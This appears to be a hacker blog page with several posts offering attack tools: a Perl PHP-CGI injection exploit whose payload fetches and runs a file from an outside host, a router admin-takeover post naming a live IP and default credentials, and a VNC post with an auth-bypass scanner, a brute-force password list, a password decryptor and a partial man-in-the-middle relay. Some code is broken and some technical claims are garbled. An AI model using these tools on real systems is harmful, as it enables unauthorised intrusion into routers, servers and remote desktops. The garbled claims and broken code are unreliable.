Help pay for xds lawyer fees.
LR

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–

comments: 0 » tags: , , , , , , , , ,

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

Fun with VNC’s – Some codes wich maybe useful for you …

Posted on 7th December 2011 in Codes, Exploits, Papers

# OK well, ill get right into it.
# The easiest bypass for VNC is the AUTH challenge code, ok, ow open up some winvnc code (remember, most vncs are
# actually based on this, or even a tightvnc code…) , anyhow, in many versions, you will find there is a part
# somewhere like this:

#define AUTH_CHALLENGE %s%s%s%s%s%s%s%s
#define CHALLENGE %s%s%s%s%s%s%s%s
#or:

#define AUTH_PWD %s%s%s%s%s%s%s%s

Depends on the code so.. ok, we have the most simplest of Buffer overflows, no boundary checks, because, well, look at it :s, then in the code, it ONLY checks the auth, on those 8 digits… ok so for example, if you want to break VNC, you must know one thing… passwords can be longer,or shorter, but, you cannot bruteforce VNC with 100 passwd lists:P
you would be lucky to get 3 goes, so guess what your BEST password would be ??
123456789
simply add this into your scanner for rBot etc…and then, maybe more…because the next b0f, i cannot disclose as it is activelyye explitable still on ALL OS, as the 8digit one, should be still..on Many…and, i do test NEW corp releases etc, against the auth bypass wich does a decrypt on the host, thats NOT disclosed,and people have called me crazy for even trying but, i have the code wich says, thats bs…and, i showed some of this to the botting community….anyhow… the problem with most bruters is simply, they dont have an easy passlist…and believe me, the best is this list here:
123456789
1234
123
vnc
master
letmein
-> nomore than 6 passes,but these will always be good enough believe it…
OK so, third section is simply, give you guys a few older codes…and, maybe, if your lucky enough, you will sometimes get chances to use them, using MY viewer,wich , does NULL auth bypass no problem, BUT, null is shitty, you want to decrypt ;) and, sorry but tht code, is still pvt after 5yrs now…
Anyhow…moving on…

Some codes:

Perl scanner wich is VERY good,but, you might want some listings,to better attack versions… :

#!/usr/bin/perl
use strict;

my $target = shift;
die "Usage: $0 <ip/host>\n" unless $target;
my $scanner = VNCScanner->new;
$scanner->scan($target);
package VNCScanner;
use IO::Socket::INET;

sub new {
    my ($class) = @_;
    my $self = {};
    return bless $self, $class;
}
*socket = \&sock;
sub sock { $_[0]->{sock} }

sub scan {
    my ($self, $host) = @_;
    my $socket = IO::Socket::INET->new(
                                       PeerAddr => $host,
                                       PeerPort => '5900',
                                       Proto    => 'tcp',
                                       ) or warn "Error connecting to $host: $!\n";
    if ($socket && $socket->connected) {
        $self->{sock} = $socket;
        $self->connect;
    }
}

sub connect {
    my $self = shift;
    my $socket = $self->sock;
    # read protocol version
    my $proto_v;
    $socket->read($proto_v, 12);
    $proto_v ||= '';
    chomp $proto_v;
    my ($maj_v, $min_v) = $proto_v =~ /RFB (\d+)\.(\d+)/;
    $self->{maj_v} = $maj_v;
    $self->{min_v} = $min_v;
    $self->log("Found RFB server ($maj_v.$min_v)");
    if ($maj_v == 3) {
        $self->auth;
    } elsif ($maj_v) {
        $self->log("Unknown RFB version $maj_v");
    } else {
        $self->log("Unknown RFB version response: $proto_v");
    }
}

sub auth {
    my $self = shift;
    my $sock = $self->sock;
    if ($self->{min_v} >= 7) {
        # do v. 7 auth
        $sock->print("RFB 003.007\n");                     ## this is type most UNiX use :P ~~ -xd
        # should receive 1 byte count of auth types
        my $sec_t_cnt;
        $sock->read($sec_t_cnt, 1);
        if ($sec_t_cnt) {
            # read array of auth types
            my $sec_t_array;
            $sock->read($sec_t_array, int($sec_t_cnt));
            # try auth bypass
            $sock->print(pack('C', 0x01)); # auth type none  NULL BYPASS here... but this is basic and crude -xd
            $self->check_auth_resp;
        } else {
            my $err_str_len;
            $sock->read($err_str_len, 4);
            $err_str_len = unpack('N', $err_str_len) + 0;
            my $err_str;
            $sock->read($err_str, $err_str_len);
            $self->log("Got auth error: $err_str");
        }
    } else {
        # request version 3.3 auth
        $sock->print("RFB 003.003\n");
        # should get a type back
        my $sec_t;
        $sock->read($sec_t, 4);
        $sec_t = unpack('N', $sec_t);
        unless ($sec_t) {
            $self->log("Auth rejected");
            return;
        }
        if ($sec_t == 1) {
            # no auth, yay
            $self->log("No auth required!");
        } else {
            $self->log("Auth type $sec_t requested. Giving up.");
        }
    }
}

sub check_auth_resp {
    my $self = shift;
    my $sock = $self->sock;
    # read securityresult
    my $sec_res;
    $sock->read($sec_res, 4);
    $sec_res = unpack('N', $sec_res);
    if ($sec_res == 0) {
        # we're in!
        $self->log("Connected successfully!");
    } else {
        # read reason
        my $err_str_len;
        $sock->read($err_str_len, 4);
        $err_str_len = unpack('N*', $err_str_len) + 0;
        my $err_str;
        $sock->read($err_str, $err_str_len);
        $self->log("Error in authentication: $err_str");
        # server will disconnect
        $sock->close;
    }
}

sub log {
    my ($self, ,$msg) = @_;
    my $sock = $self->sock;
    my $addr = $sock ? $sock->peerhost : '';
    print "[$addr] $msg\n";
}

And now the best thing i think you might wanna play with…. is decrypting the better vncs ;)

Some .c code here i moved into the download pack also, so you can like, fix it :P 

/* VNC password decoder */
/* tested on Linux */
/* I take no credit */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>

#define MAXPWLEN 8                       //---> haha w00ps we forgot to make auth only on the first 8 digits!
#define CHALLENGESIZE 16
#define EN0     0       /* MODE == encrypt */
#define DE1     1       /* MODE == decrypt */

extern int vncEncryptPasswd(char *passwd, char *fname);
extern char *vncDecryptPasswd(char *fname);
extern void vncRandomBytes(unsigned char *bytes);
extern void vncEncryptBytes(unsigned char *bytes, const char *passwd);
extern void deskey(unsigned char *, int);
extern void usekey(unsigned long *);
extern void cpkey(unsigned long *);
extern void des(unsigned char *, unsigned char *);   // yea,ya want the d3des/rfb.h..or ya will never get this..

unsigned char fixedkey[8] = {23,82,107,6,35,78,88,7};   // and the char [8] fixed-key for all auths :)
                                                        // proof that the bug exists 100% -xd

void main (void) {
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};   // change this..if you want to, if you know wtf ur doin -xd

printf("%8s\n",vncDecryptPasswd(p));
}

char *vncDecryptPasswd(char *inouttext) {
    unsigned char *passwd = (unsigned char *)malloc(9);
    deskey(fixedkey, DE1);
    des(inouttext, passwd);
    passwd[8] = 0;     //ohno...well look here...it only checks 8 password length afterall - passwd[8] = 0; -xd
    return (char *)passwd;
}

static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);

static unsigned long KnL[32] = { 0L };
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
	0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
	0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
	0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };

static unsigned short bytebit[8]	= { 01, 02, 04, 010, 020, 040, 0100, 0200 };

static unsigned long bigbyte[24] = {
	0x800000L,	0x400000L,	0x200000L,	0x100000L,
	0x80000L,	0x40000L,	0x20000L,	0x10000L,
	0x8000L,	0x4000L,	0x2000L,	0x1000L,
	0x800L, 	0x400L, 	0x200L, 	0x100L,
	0x80L,		0x40L,		0x20L,		0x10L,
	0x8L,		0x4L,		0x2L,		0x1L	};

/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
static unsigned char pc1[56] = {
	56, 48, 40, 32, 24, 16,  8,	 0, 57, 49, 41, 33, 25, 17,
	 9,  1, 58, 50, 42, 34, 26,	18, 10,  2, 59, 51, 43, 35,
	62, 54, 46, 38, 30, 22, 14,	 6, 61, 53, 45, 37, 29, 21,
	13,  5, 60, 52, 44, 36, 28,	20, 12,  4, 27, 19, 11,  3 };

static unsigned char totrot[16] = {
	1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 };

static unsigned char pc2[48] = {
	13, 16, 10, 23,  0,  4,  2, 27, 14,  5, 20,  9,
	22, 18, 11,  3, 25,  7, 15,  6, 26, 19, 12,  1,
	40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
	43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 };

void deskey(key, edf)
unsigned char *key;
int edf;
{
	register int i, j, l, m, n;
	unsigned char pc1m[56], pcr[56];
	unsigned long kn[32];
	for ( j = 0; j < 56; j++ ) {
		l = pc1[j];
		m = l & 07;
		pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;
		}
	for( i = 0; i < 16; i++ ) {
		if( edf == DE1 ) m = (15 - i) << 1;
		else m = i << 1;
		n = m + 1;
		kn[m] = kn[n] = 0L;
		for( j = 0; j < 28; j++ ) {
			l = j + totrot[i];
			if( l < 28 ) pcr[j] = pc1m[l];
			else pcr[j] = pc1m[l - 28];
			}
		for( j = 28; j < 56; j++ ) {
		    l = j + totrot[i];
		    if( l < 56 ) pcr[j] = pc1m[l];
		    else pcr[j] = pc1m[l - 28];
		    }
		for( j = 0; j < 24; j++ ) {
			if( pcr[pc2[j]] ) kn[m] |= bigbyte[j];
			if( pcr[pc2[j+24]] ) kn[n] |= bigbyte[j];
			}
		}
	cookey(kn);
	return;
	}

static void cookey(raw1)
register unsigned long *raw1;
{
	register unsigned long *cook, *raw0;
	unsigned long dough[32];
	register int i;
	cook = dough;
	for( i = 0; i < 16; i++, raw1++ ) {
		raw0 = raw1++;
		*cook	 = (*raw0 & 0x00fc0000L) << 6;
		*cook	|= (*raw0 & 0x00000fc0L) << 10;
		*cook	|= (*raw1 & 0x00fc0000L) >> 10;
		*cook++ |= (*raw1 & 0x00000fc0L) >> 6;
		*cook	 = (*raw0 & 0x0003f000L) << 12;
		*cook	|= (*raw0 & 0x0000003fL) << 16;
		*cook	|= (*raw1 & 0x0003f000L) >> 4;
		*cook++ |= (*raw1 & 0x0000003fL);
		}
	usekey(dough);
	return;
	}

void cpkey(into)
register unsigned long *into;
{
	register unsigned long *from, *endp;
	from = KnL, endp = &KnL[32];
	while( from < endp ) *into++ = *from++;
	return;
	}

void usekey(from)
register unsigned long *from;
{
	register unsigned long *to, *endp;
	to = KnL, endp = &KnL[32];
	while( to < endp ) *to++ = *from++;
	return;
	}

void des(inblock, outblock)
unsigned char *inblock, *outblock;
{
	unsigned long work[2];
	scrunch(inblock, work);
	desfunc(work, KnL);
	unscrun(work, outblock);
	return;
	}

static void scrunch(outof, into)
register unsigned char *outof;
register unsigned long *into;
{
	*into	 = (*outof++ & 0xffL) << 24;
	*into	|= (*outof++ & 0xffL) << 16;
	*into	|= (*outof++ & 0xffL) << 8;
	*into++ |= (*outof++ & 0xffL);
	*into	 = (*outof++ & 0xffL) << 24;
	*into	|= (*outof++ & 0xffL) << 16;
	*into	|= (*outof++ & 0xffL) << 8;
	*into	|= (*outof   & 0xffL);
	return;
	}

static void unscrun(outof, into)
register unsigned long *outof;
register unsigned char *into;
{
	*into++ = (*outof >> 24) & 0xffL;
	*into++ = (*outof >> 16) & 0xffL;
	*into++ = (*outof >>  8) & 0xffL;
	*into++ =  *outof++	 & 0xffL;
	*into++ = (*outof >> 24) & 0xffL;
	*into++ = (*outof >> 16) & 0xffL;
	*into++ = (*outof >>  8) & 0xffL;
	*into	=  *outof	 & 0xffL;
	return;
	}

static unsigned long SP1[64] = {
	0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
	0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
	0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
	0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
	0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
	0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
	0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
	0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
	0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
	0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
	0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
	0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
	0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
	0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L };

static unsigned long SP2[64] = {
	0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
	0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
	0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
	0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
	0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
	0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
	0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
	0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
	0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
	0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
	0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
	0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
	0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
	0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
	0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
	0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L };

static unsigned long SP3[64] = {
	0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
	0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
	0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
	0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
	0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
	0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
	0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
	0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
	0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
	0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
	0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
	0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
	0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
	0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
	0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
	0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L };

static unsigned long SP4[64] = {
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
	0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
	0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
	0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
	0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
	0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
	0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
	0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
	0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L };

static unsigned long SP5[64] = {
	0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
	0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
	0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
	0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
	0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
	0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
	0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
	0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
	0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
	0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
	0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
	0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
	0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
	0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
	0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
	0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L };

static unsigned long SP6[64] = {
	0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
	0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
	0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
	0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
	0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
	0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
	0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
	0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
	0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
	0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
	0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
	0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
	0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
	0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L };

static unsigned long SP7[64] = {
	0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
	0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
	0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
	0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
	0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
	0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
	0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
	0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
	0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
	0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
	0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
	0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
	0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
	0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
	0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
	0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L };

static unsigned long SP8[64] = {
	0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
	0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
	0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
	0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
	0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
	0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
	0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
	0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
	0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
	0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
	0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
	0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
	0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
	0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
	0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
	0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L };

static void desfunc(block, keys)
register unsigned long *block, *keys;
{
	register unsigned long fval, work, right, leftt;
	register int round;
	leftt = block[0];
	right = block[1];
	work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
	right ^= work;
	leftt ^= (work << 4);
	work = ((leftt >> 16) ^ right) & 0x0000ffffL;
	right ^= work;
	leftt ^= (work << 16);
	work = ((right >> 2) ^ leftt) & 0x33333333L;
	leftt ^= work;
	right ^= (work << 2);
	work = ((right >> 8) ^ leftt) & 0x00ff00ffL;
	leftt ^= work;
	right ^= (work << 8);
	right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = ((leftt << 1) | ((leftt>>31) & 1L)) & 0xffffffffL;
	for( round = 0; round < 8; round++ ) {
		work  = (right<<28) | (right>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work>>8) & 0x3fL];
		fval |= SP3[(work>>16) & 0x3fL];
		fval |= SP1[(work>>24) & 0x3fL];
		work  = right ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work>>8) & 0x3fL];
		fval |= SP4[(work>>16) & 0x3fL];
		fval |= SP2[(work>>24) & 0x3fL];
		leftt ^= fval;
		work  = (leftt << 28) | (leftt>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work >>  8) & 0x3fL];
		fval |= SP3[(work >> 16) & 0x3fL];
		fval |= SP1[(work >> 24) & 0x3fL];
		work  = leftt ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work >>  8) & 0x3fL];
		fval |= SP4[(work >> 16) & 0x3fL];
		fval |= SP2[(work >> 24) & 0x3fL];
		right ^= fval;
		}
	right = (right << 31) | (right >> 1);
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = (leftt << 31) | (leftt >> 1);
	work = ((leftt >> 8) ^ right) & 0x00ff00ffL;
	right ^= work;
	leftt ^= (work << 8);
	work = ((leftt >> 2) ^ right) & 0x33333333L;
	right ^= work;
	leftt ^= (work << 2);
	work = ((right >> 16) ^ leftt) & 0x0000ffffL;
	leftt ^= work;
	right ^= (work << 16);
	work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
	leftt ^= work;
	right ^= (work << 4);
	*block++ = right;
	*block = leftt;
	return;
	}
[/code]

hehe thats basically, how a standard decryptor works, so, spot that 8digit bug yet ?? lol..... blieve me, use it!

now... one more code,and thats IT! THIS is a different method.. VNC MiTM attack! yea bitches... watchout!

1
#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define VNCPORT 5900
#define VNCSERVER "x.x.x.x"  // enter ya fakey here :P  this only is for, making it exec,
                             // look at bottom where it shows how todo this..
#define QUEUE 8
#define BUFSIZ 512

typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12

int main (int argc, char **argv) {
int sockfd, clientfd, vncfd;
int nbytes = 0;
struct sockaddr_in server, client, vnc;
int len = sizeof (client);
char buf [BUFSIZ];
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&server, sizeof (server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (INADDR_ANY);
server.sin_port = htons (VNCPORT);
/* this is the fake VNC server */
if (bind (sockfd, (struct sockaddr *) &server, sizeof (server)) == -1) {
perror ("bind");
exit (-1);
}
listen (sockfd, QUEUE);
if ((clientfd = accept (sockfd,(struct sockaddr *) &client, &len)) == -1) {
perror ("accept");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* we must send VNC version number (from proto) */
if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we also must read VNC version number (from protocol) */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
buf [nbytes] = 0;
printf ("[VNC Version] -> %s\n", buf);
buf [0] = 0x00;
buf [1] = 0x00;
buf [2] = 0x00;
buf [3] = 0x02;
/* we send the authentication method code to the client */
if (write (clientfd, buf, 4) < 4) {
perror ("write");
exit (-1);
}
if ((vncfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&vnc, sizeof (vnc));
vnc.sin_family = AF_INET;
vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
vnc.sin_port = htons (VNCPORT);
/* we connect to the real VNC server */
if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc) ) == -1) {
perror ("connect");
exit (-1);
}
/* again, we read version number from the VNC server */
if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
perror ("read");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* and we send ours */
if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read auth method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted pass from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted pass to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the auth process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authd */
